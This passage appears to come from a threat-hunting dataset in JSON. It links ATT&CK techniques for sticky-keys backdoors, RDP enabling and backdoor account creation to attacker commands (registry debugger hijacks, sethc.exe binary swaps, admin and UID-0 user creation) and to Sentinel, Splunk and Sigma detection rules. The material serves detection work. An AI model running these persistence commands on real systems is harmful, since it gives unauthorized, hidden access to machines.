"https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "cmd.exe reg add", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe /v \"Debugger\" /t REG_SZ /d \"C:\\windows\\system32\\cmd.exe\" /f", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\magnify.exe /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\narrator.exe /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DisplaySwitch.exe /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\AtBroker.exe /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": 
"powershell/lateral_movement/invoke_wmi_debugger", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/persistence/misc/debugger", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1015", + "Built-in Windows Command": "Sticky Keys Persistence via Registry Manipulations:\nREG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /t REG_SZ /d \"C:\\windows\\system32\\cmd.exe\" /f", + "Cobalt Strike": "Sticky Keys Persistence via Registry Manipulations:\nshell REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /t REG_SZ /d \"C:\\windows\\system32\\cmd.exe\" /f", + "Metasploit": "post/windows/manage/sticky_keys", + "Description": "Modify the registry to point the sethc.exe file to point to cmd.exe" + }, + { + "Category": "T1015", + "Built-in Windows Command": "Sticky Keys Persistence via binary swapping:\ntakeown.exe C:\\Windows\\system32\\sethc.exe\ndel C:\\Windows\\system32\\sethc.exe\ncopy C:\\Windows\\system32\\cmd.exe C:\\Windows\\system32\\sethc.exe", + "Cobalt Strike": "Sticky Keys Persistence via binary swapping:\nshell takeown.exe C:\\Windows\\system32\\sethc.exe\nshell del C:\\Windows\\system32\\sethc.exe\nshell copy C:\\Windows\\system32\\cmd.exe C:\\Windows\\system32\\sethc.exe", + "Metasploit": "", + "Description": "Remove the real sethc.exe and replace it with a copy of cmd.exe. 
You can also just move the original sethc.exe to a different file if you don't want to delete it" + }, + { + "chain_id": "100175", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg add", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe /v \"Debugger\" /t REG_SZ /d \"C:\\windows\\system32\\cmd.exe\" /f", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "accessibity_features", + "mitre_attack": "T1015", + "itw_sample": "" + }, + { + "chain_id": "100176", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg add", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "accessibity_features", + "mitre_attack": "T1015", + "itw_sample": "" + }, + { + "chain_id": "100177", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg add", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "accessibity_features", + "mitre_attack": "T1015", + "itw_sample": "" + }, + { + "chain_id": "100178", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg add", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution 
Options\\magnify.exe /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "accessibity_features", + "mitre_attack": "T1015", + "itw_sample": "" + }, + { + "chain_id": "100179", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg add", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\narrator.exe /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "accessibity_features", + "mitre_attack": "T1015", + "itw_sample": "" + }, + { + "chain_id": "100180", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg add", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DisplaySwitch.exe /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "accessibity_features", + "mitre_attack": "T1015", + "itw_sample": "" + }, + { + "chain_id": "100181", + "os": "windows", + "parent_process": "cmd.exe", + "commandline_string": "reg add", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\AtBroker.exe /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "accessibity_features", + "mitre_attack": "T1015", + "itw_sample": "" + }, + { + "Empire Module": "powershell/lateral_movement/invoke_wmi_debugger", + "ATT&CK Technique #1": 
"T1015", + "ATT&CK Technique #2": "", + "Technique": "Accessibility Features", + "Concatenate for Python Dictionary": "\"powershell/lateral_movement/invoke_wmi_debugger\": [\"T1015\"]," + }, + { + "Empire Module": "powershell/persistence/misc/debugger", + "ATT&CK Technique #1": "T1015", + "ATT&CK Technique #2": "", + "Technique": "Accessibility Features", + "Concatenate for Python Dictionary": "\"powershell/persistence/misc/debugger\": [\"T1015\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and process_parent_path contains\"winlogon.exe\"and (process_path contains \"sethc.exe\"or process_path contains \"utilman.exe\"or process_path contains \"osk.exe\"or process_path contains \"magnify.exe\"or process_path contains \"displayswitch.exe\"or process_path contains \"narrator.exe\"or process_path contains \"atbroker.exe\")", + "name": "Accessibility Features" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14) and registry_key_path contains \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\"", + "name": "Accessibility Features Registry" + } + ], + "possible_detections": [ + { + "action": "global", + "title": "Sticky Key Like Backdoor Usage", + "id": "baca5663-583c-45f9-b5dc-ea96a22ce542", + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "references": [ + "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/" + ], + "tags": [ + "attack.privilege_escalation", + "attack.persistence", + "attack.t1015", + "car.2014-11-003", + "car.2014-11-008" + ], + "author": "Florian Roth, @twjackomo", + "date": "2018/03/15", + "detection": { + "condition": "1 of them" + }, + "falsepositives": [ + "Unlikely" + ], + "level": "critical" + }, + { + 
"logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection_registry": { + "EventID": 13, + "TargetObject": [ + "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger", + "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\\Debugger", + "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe\\Debugger", + "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe\\Debugger", + "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe\\Debugger", + "*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DisplaySwitch.exe\\Debugger" + ], + "EventType": "SetValue" + } + } + }, + { + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection_process": { + "ParentImage": [ + "*\\winlogon.exe" + ], + "CommandLine": [ + "*cmd.exe sethc.exe *", + "*cmd.exe utilman.exe *", + "*cmd.exe osk.exe *", + "*cmd.exe Magnify.exe *", + "*cmd.exe Narrator.exe *", + "*cmd.exe DisplaySwitch.exe *" + ] + } + } + }, + { + "title": "Suspicious Debugger Registration Cmdline", + "id": "ae215552-081e-44c7-805f-be16f975c8a2", + "status": "experimental", + "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", + "references": [ + "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1015" + ], + "author": "Florian Roth", + "date": "2019/09/06", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": [ + "*\\CurrentVersion\\Image File Execution Options\\sethc.exe*", + "*\\CurrentVersion\\Image File Execution 
Options\\utilman.exe*", + "*\\CurrentVersion\\Image File Execution Options\\osk.exe*", + "*\\CurrentVersion\\Image File Execution Options\\magnify.exe*", + "*\\CurrentVersion\\Image File Execution Options\\narrator.exe*", + "*\\CurrentVersion\\Image File Execution Options\\displayswitch.exe*" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Penetration Tests" + ], + "level": "high" + }, + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ], + [ + "AutoRuns" + ], + [ + "4688", + "Process Execution" + ], + [ + "LOG-MD", + "AutoRuns" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ] + ], + "external_reference": [ + "http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016", + "https://www.emc.com/collateral/white-papers/h12756-wp-shell-crew.pdf", + "http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf", + "http://carnal0wnage.attackresearch.com/2012/09/more-on-aptsim.html", + "https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html" + ] + }, + { + "technique_id": "T1076", + "command_list": [ + "Enable RDP Services:\nREG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 0 /f\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f \nnet start TermService", + "Enable RDP Services:\nshell REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 0 /f\nshell reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f \nshell net start TermService", + "post/windows/manage/enable_rdp", + "mstsc.exe|tscon.exe", + "powershell/management/enable_multi_rdp", + "powershell/management/enable_rdp" + ], + "commands": [ + { + 
"command": "Enable RDP Services:\nREG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 0 /f\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f \nnet start TermService", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "Enable RDP Services:\nshell REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 0 /f\nshell reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f \nshell net start TermService", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "post/windows/manage/enable_rdp", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "mstsc.exe|tscon.exe", + "source": "SysmonHunter - Remote Desktop Protocol", + "name": "" + }, + { + "command": "powershell/management/enable_multi_rdp", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/enable_rdp", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1076", + "Built-in Windows Command": "Enable RDP Services:\nREG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 0 /f\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f \nnet start TermService", + "Cobalt Strike": 
"Enable RDP Services:\nshell REG ADD \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 0 /f\nshell reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f \nshell net start TermService", + "Metasploit": "post/windows/manage/enable_rdp", + "Description": "Enable RDP via the registry and services" + }, + { + "name": "Remote Desktop Protocol", + "description": null, + "level": "medium", + "phase": "Lateral Movement", + "query": [ + { + "type": "process", + "process": { + "any": { + "pattern": "mstsc.exe|tscon.exe" + } + } + } + ] + }, + { + "Empire Module": "powershell/management/enable_multi_rdp", + "ATT&CK Technique #1": "T1076", + "ATT&CK Technique #2": "T1043", + "Technique": "Remote Desktop Protocol", + "Concatenate for Python Dictionary": "\"powershell/management/enable_multi_rdp\": [\"T1076\",\"T1043\"]," + }, + { + "Empire Module": "powershell/management/enable_rdp", + "ATT&CK Technique #1": "T1076", + "ATT&CK Technique #2": "", + "Technique": "Remote Desktop Protocol", + "Concatenate for Python Dictionary": "\"powershell/management/enable_rdp\": [\"T1076\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and(process_path contains \"tscon.exe\"or process_path contains \"mstsc.exe\")", + "name": "Remote Desktop Protocol Process" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14)and (process_path contains \"LogonUI.exe\"or registry_key_path contains \"\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\\")", + "name": "Remote Desktop Protocol Registry" + } + ], + "possible_detections": [ + { + "title": "RDP over Reverse SSH Tunnel", + "id": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", + "status": "experimental", + "description": "Detects svchost hosting RDP termsvcs communicating with the 
loopback address and on TCP port 3389", + "references": [ + "https://twitter.com/SBousseaden/status/1096148422984384514" + ], + "author": "Samir Bousseaden", + "date": "2019/02/16", + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1076", + "car.2013-07-002" + ], + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 3, + "Image": "*\\svchost.exe", + "Initiated": "true", + "SourcePort": 3389, + "DestinationIp": [ + "127.*", + "::1" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "unknown" + ], + "level": "high" + }, + { + "title": "RDP Login from localhost", + "id": "51e33403-2a37-4d66-a574-1fda1782cc31", + "description": "RDP login with localhost source address may be a tunnelled login", + "references": [ + "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html" + ], + "date": "2019/01/28", + "modified": "2019/01/29", + "tags": [ + "attack.lateral_movement", + "attack.t1076", + "car.2013-07-002" + ], + "status": "experimental", + "author": "Thomas Patzke", + "logsource": { + "product": "windows", + "service": "security" + }, + "detection": { + "selection": { + "EventID": 4624, + "LogonType": 10, + "SourceNetworkAddress": [ + "::1", + "127.0.0.1" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "RDP over Reverse SSH Tunnel WFP", + "id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", + "status": "experimental", + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", + "references": [ + "https://twitter.com/SBousseaden/status/1096148422984384514" + ], + "author": "Samir Bousseaden", + "date": "2019/02/16", + "tags": [ + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1076", + "car.2013-07-002" + ], + "logsource": { + "product": "windows", + "service": 
"security" + }, + "detection": { + "selection": { + "EventID": 5156 + }, + "sourceRDP": { + "SourcePort": 3389, + "DestinationAddress": [ + "127.*", + "::1" + ] + }, + "destinationRDP": { + "DestinationPort": 3389, + "SourceAddress": [ + "127.*", + "::1" + ] + }, + "condition": "selection and ( sourceRDP or destinationRDP )" + }, + "falsepositives": [ + "unknown" + ], + "level": "high" + }, + { + "title": "Suspicious RDP Redirect Using TSCON", + "id": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", + "status": "experimental", + "description": "Detects a suspicious RDP session redirect using tscon.exe", + "references": [ + "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html", + "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6" + ], + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1076", + "car.2013-07-002" + ], + "author": "Florian Roth", + "date": "2018/03/17", + "modified": "2018/12/11", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": "* /dest:rdp-tcp:*" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + [ + "4688", + "Process Execution" + ], + [ + "4624", + "Authentication logs" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "4688", + "Process Execution" + ], + [ + "4624", + "Authentication logs" + ], + [ + "Netflow/Enclave netflow" + ] + ], + "external_reference": [ + "https://www.fireeye.com/blog/threat-research/2014/05/the-pla-and-the-800am-500pm-work-day-fireeye-confirms-dojs-findings-on-apt1-intrusion-activity.html", + "https://www.justice.gov/opa/press-release/file/1121706/download", + "https://www.brighttalk.com/webcast/10703/296317/apt34-new-targeted-attack-in-the-middle-east", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf", + 
"https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf", + "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://pan-unit42.github.io/playbook_viewer/", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf", + "https://www.group-ib.com/blog/cobalt", + "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html", + "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/", + "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "http://carnal0wnage.attackresearch.com/2012/09/more-on-aptsim.html", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf" + ] + }, + { + "technique_id": "T1136", + "command_list": [ + "Add backdoor user account:\nnet user support_388945a0 somepasswordhere /add /y\nnet localgroup administrators support_388945a0 /add\nnet localgroup \"remote desktop users\" support_388945a0 /add", + "Add backdoor user account:\nshell net user support_388945a0 somepasswordhere /add /y\nshell net localgroup administrators support_388945a0 /add\nshell net localgroup \"remote desktop users\" support_388945a0 /add", + "post/windows/manage/add_user_domain", + "Enable backdoor user account:\nnet user support_388945a0 /active:yes\nnet 
localgroup administrators support_388945a0 /add\nnet localgroup \"remote desktop users\" support_388945a0 /add", + "Enable backdoor user account:\nshell net user support_388945a0 /active:yes\nshell net localgroup administrators support_388945a0 /add\nshell net localgroup \"remote desktop users\" support_388945a0 /add", + "Net.exe user /add", + "Net.exe localgroup administrators * /add", + "Net.exe user * \\password \\domain", + "Net.exe dsadd user", + "powershell/persistence/misc/add_netuser", + "powershell/privesc/powerup/service_useradd", + "useradd -M -N -r -s /bin/bash -c \"#{comment}\" #{username}", + "useradd -o -u 0 -g 0 -M -d /root -s /bin/bash #{username}" + ], + "commands": [ + { + "command": "Add backdoor user account:\nnet user support_388945a0 somepasswordhere /add /y\nnet localgroup administrators support_388945a0 /add\nnet localgroup \"remote desktop users\" support_388945a0 /add", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "Add backdoor user account:\nshell net user support_388945a0 somepasswordhere /add /y\nshell net localgroup administrators support_388945a0 /add\nshell net localgroup \"remote desktop users\" support_388945a0 /add", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "post/windows/manage/add_user_domain", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "Enable backdoor user account:\nnet user support_388945a0 /active:yes\nnet localgroup administrators support_388945a0 /add\nnet localgroup \"remote desktop users\" support_388945a0 /add", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "Enable backdoor user account:\nshell net user support_388945a0 /active:yes\nshell 
net localgroup administrators support_388945a0 /add\nshell net localgroup \"remote desktop users\" support_388945a0 /add", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "Net.exe user /add", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "Net.exe localgroup administrators * /add", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "Net.exe user * \\password \\domain", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "Net.exe dsadd user", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "powershell/persistence/misc/add_netuser", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/privesc/powerup/service_useradd", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "useradd -M -N -r -s /bin/bash -c \"#{comment}\" #{username}", + "source": "Kirtar22/Litmus_Test", + "name": "" + }, + { + "command": "useradd -o -u 0 -g 0 -M -d /root -s /bin/bash #{username}", + "source": "Kirtar22/Litmus_Test", + "name": "" + } + ], + "parsed_datasets": [ + { + "Category": "T1136", + "Built-in Windows Command": "Add backdoor user account:\nnet user support_388945a0 somepasswordhere /add /y\nnet localgroup administrators support_388945a0 /add\nnet localgroup \"remote desktop users\" support_388945a0 /add", + "Cobalt Strike": "Add backdoor user account:\nshell net user support_388945a0 somepasswordhere /add /y\nshell net localgroup administrators support_388945a0 /add\nshell net localgroup \"remote desktop users\" support_388945a0 /add", + "Metasploit": "post/windows/manage/add_user_domain", + "Description": "Create a backdoor user account that often appears on windows systems and add that user to 
the local administrators group and the remote desktop users group. This combined with the sticky keys persistence grants an inocuous system level persistence mechanism." + }, + { + "Category": "T1136", + "Built-in Windows Command": "Enable backdoor user account:\nnet user support_388945a0 /active:yes\nnet localgroup administrators support_388945a0 /add\nnet localgroup \"remote desktop users\" support_388945a0 /add", + "Cobalt Strike": "Enable backdoor user account:\nshell net user support_388945a0 /active:yes\nshell net localgroup administrators support_388945a0 /add\nshell net localgroup \"remote desktop users\" support_388945a0 /add", + "Metasploit": "", + "Description": "If the support_388945a0 account already exists on the system, but is disabled, you can enable it and then add it to the necessary groups." + }, + { + "chain_id": "100133", + "os": "windows", + "parent_process": "Net.exe", + "commandline_string": "user /add", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "create_account", + "mitre_attack": "T1136", + "itw_sample": "" + }, + { + "chain_id": "100134", + "os": "windows", + "parent_process": "Net.exe", + "commandline_string": "localgroup administrators * /add", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "create_account", + "mitre_attack": "T1136", + "itw_sample": "" + }, + { + "chain_id": "100135", + "os": "windows", + "parent_process": "Net.exe", + "commandline_string": "user * \\password \\domain", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "create_account", + "mitre_attack": "T1136", + "itw_sample": "" + }, + 
{ + "chain_id": "100136", + "os": "windows", + "parent_process": "Net.exe", + "commandline_string": "dsadd user", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "create_account", + "mitre_attack": "T1136", + "itw_sample": "" + }, + { + "Empire Module": "powershell/persistence/misc/add_netuser", + "ATT&CK Technique #1": "T1136", + "ATT&CK Technique #2": "", + "Technique": "Create Account", + "Concatenate for Python Dictionary": "\"powershell/persistence/misc/add_netuser\": [\"T1136\"]," + }, + { + "Empire Module": "powershell/privesc/powerup/service_useradd", + "ATT&CK Technique #1": "T1136", + "ATT&CK Technique #2": "", + "Technique": "Create Account", + "Concatenate for Python Dictionary": "\"powershell/privesc/powerup/service_useradd\": [\"T1136\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1and (process_command_line contains \"New-LocalUser\"or process_command_line contains \"net user add\")", + "name": "Create Account" + }, + { + "product": "Splunk", + "query": "index=main source=\"/var/log/secure\" eventtype=useradd | table user,host,src, UID, GID", + "name": "" + }, + { + "product": "Splunk", + "query": "index=linux source=\"/var/log/secure\" eventtype=userdel delete| table user,host", + "name": "" + }, + { + "product": "Splunk", + "query": "Root Account Creation: index=linux source=\"/var/log/secure\" eventtype=useradd UID=0 OR GID=0", + "name": "" + } + ], + "possible_detections": [ + "/var/log/secure with \"useradd\" and \"userdel\"", + { + "title": "Detects local user creation", + "id": "66b6be3d-55d0-4f47-9855-d69df21740ea", + "description": "Detects local user creation on windows servers, which shouldn't happen in an Active Directory environment. 
